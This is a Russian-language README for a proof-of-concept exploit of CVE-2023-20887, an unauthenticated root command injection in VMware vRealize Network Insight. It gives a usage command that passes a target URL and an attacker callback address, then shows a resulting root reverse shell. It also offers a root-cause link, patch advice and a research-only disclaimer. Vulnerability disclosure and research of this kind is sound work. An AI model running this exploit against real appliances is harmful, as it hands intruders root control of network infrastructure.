
VMWare vRealize Network Insight — RCE до аутентификации (CVE-2023-20887)
POC для CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight): удалённое выполнение кода (RCE) без аутентификации
Анализ первопричины уязвимости можно найти в моём блоге: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight) подвержен внедрению команд при приёме пользовательского ввода через интерфейс Apache Thrift RPC. Данная уязвимость позволяет удалённому неаутентифицированному злоумышленнику выполнять произвольные команды в базовой операционной системе от имени пользователя root. Интерфейс RPC защищён обратным прокси, который можно обойти. VMware оценила серьёзность данной проблемы как критическую с максимальной базовой оценкой CVSSv3 9.8. Злоумышленник может получить удалённое выполнение кода в контексте пользователя 'root' на устройстве. Версии VMWare 6.x уязвимы.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Обновитесь до последней версии или примите меры по устранению, следуя инструкциям, приведённым в Progress Advisory.
Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных защитных методов и не предназначено для атак на системы, за исключением случаев, когда это явно разрешено. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.